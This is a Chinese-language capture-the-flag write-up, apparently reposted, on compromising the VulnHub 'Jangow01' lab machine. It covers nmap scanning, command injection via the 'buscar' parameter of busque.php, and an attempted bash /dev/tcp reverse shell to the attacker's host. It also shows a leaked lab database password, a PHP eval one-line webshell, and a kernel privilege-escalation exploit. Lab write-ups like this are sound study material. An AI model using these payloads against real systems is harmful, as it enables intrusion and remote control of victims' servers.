No.1 Jangow01

Posted w1th0ut

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了No.1 Jangow01相关的知识,希望对你有一定的参考价值。

前排提示:评论区输入“蟹黄堡”即可享受全程几乎无广告沉浸式阅读 =v=

文章目录


前言

记录vuln靶场扫荡第一天2022.10.28

耶!今天可爱美丽的黄老师帮我解决了靶场网络难题,我爱死她了哈哈 ~ v ~

通往罗马的路不止一条,解题的方法也各有千秋,大家要学会阅读各个博主的文章吸收精华才能有所提升。

靶机信息

难度:简单
IP:192.168.200.132
提示信息:The secret to this box is enumeration! Inquiries jangow2021@gmail.com

配置网络

由于个人电脑原因,具体是什么原因我也没有弄清楚,因为其他的靶机设置为NET模式即可自动获取IP地址,但唯独这台靶机以及红日靶场的边界web服务机无法启动网卡,尝试很久也没有办法解决。

我们下载下来的jangow01这类靶机都是有密码才能开机的,所以我们才要去攻破它嘛,但我网络连不上,都没办法碰到它,更别说攻击它了。我在网络上找了很多文章都没有对应的密码内容,那只好请教我的老师了。

思路是利用ubuntu的拯救模式改密码
然后进入主机后修改网卡

什么是老师?

她说

https://www.it610.com/article/1289993168506396672.htm

她说

她说

这里由于修改完密码进入出现乱码问题无法输入Esc键没办法进入编辑,只有利用echo语句写入两行信息。

她说

信息收集

找ip

对于局域网内扫描存活的主机方法有很多种
可以参考下文

https://blog.csdn.net/weixin_39624774/article/details/111282245

一般情况下建议利用-PR进行arp探测会有更高的准确性,因为部分主机可能禁icmp协议导致对方不回复ping信息导致误判为无该ip主机或者主机为down状态,也就是结果会有遗漏。

哈哈哈哈bb半天我也没用arp扫描
nmap -sn 192.168.200.0/24

扫描端口

nmap -p- 192.168.200.132

-p-参数是全端口扫描 (端口总数65535个)

对于靶场这种场景建议是全端口扫描不要遗漏半点蛛丝马迹(出题人碧娇苟)

攻击

80端口用浏览器访问一下:

点一下唯一一个可以点的**site/**链接

点来点去就右上角的三个按钮可用,但是第一第二个按钮没啥用,第三个Buscar按钮点击后页面跳转到

http://192.168.200.132/site/busque.php?buscar=

很明显这里可以给buscar参数传值了
传啥呢?
这题难度是简单哎(明摆着就是命令执行漏洞RCE)

传这个

whoami#问问我是谁

效果如下

突破

我们先反弹个shell
可以看看我的反弹shell文章

https://blog.csdn.net/qq_52173020/article/details/125011441?spm=1001.2014.3001.5501

kali保持监听状态

把命令带入给参数buscar

http://192.168.200.132/site/busque.php?buscar=bash%20-i%20%3E&%20/dev/tcp/192.168.200.128/9999%200%3E&1

kali没连上,弹不动?
再试试
写个php再用kali去curl一下,发现根本写不进去

放弃反弹shell,查看该目录下文件,进入一下wordpress目录查看一下,因为是俩个动作,一个是进入wordpress目录,一个是查看该目录下文件所以中间要用分号

再看一下config.php
出题者有良心,把内容写在注释给咱们看

<!--?php
$servername = "localhost";
$database = "desafio02";
$username = "desafio02";//账号
$password = "abygurl69";//密码
// Create connection
$conn = mysqli_connect($servername, $username, $password, $database);
// Check connection
if (!$conn) 
    die("Connection failed: " . mysqli_connect_error());

echo "Connected successfully";
mysqli_close($conn);
?-->

这不账号密码都出来了
我没记错的话端口扫描的时候还有一个21的ftp端口号
我们试试

空荡荡的一片

再缓缓,我感觉写反弹shell的文件我写错了,多个‘>’会出现冲突,单双引号优先级不同?,我明天再复习复习

写个一句话木马试试吧

echo '<?php eval($_POST["1"]);?>' > 1.php



帅是几个字?嘻嘻

在home下发现一个奇怪的东西

这还有一个

提权

看内核信息

找对应的提权洞洞

使用

searchsploit -m 文档名

将文件复制到当前目录 复制到当前目录可以使用 ”cat 文档名“ 查看

拖到蚁剑里面执行

赋予执行权限
执行后获取root权限

在根目录下查看文件proof.txt

结束
下班
哈哈~

以上是关于No.1 Jangow01的主要内容,如果未能解决你的问题,请参考以下文章

VulnHub_Jangow: 1.0.1

VulnHub_Jangow: 1.0.1

网安初学01

2017-2018-2 20165237 实验五《网络编程与安全》实验报告

网络安全网络安全的重要性你知道吗?

网络攻防第七周作业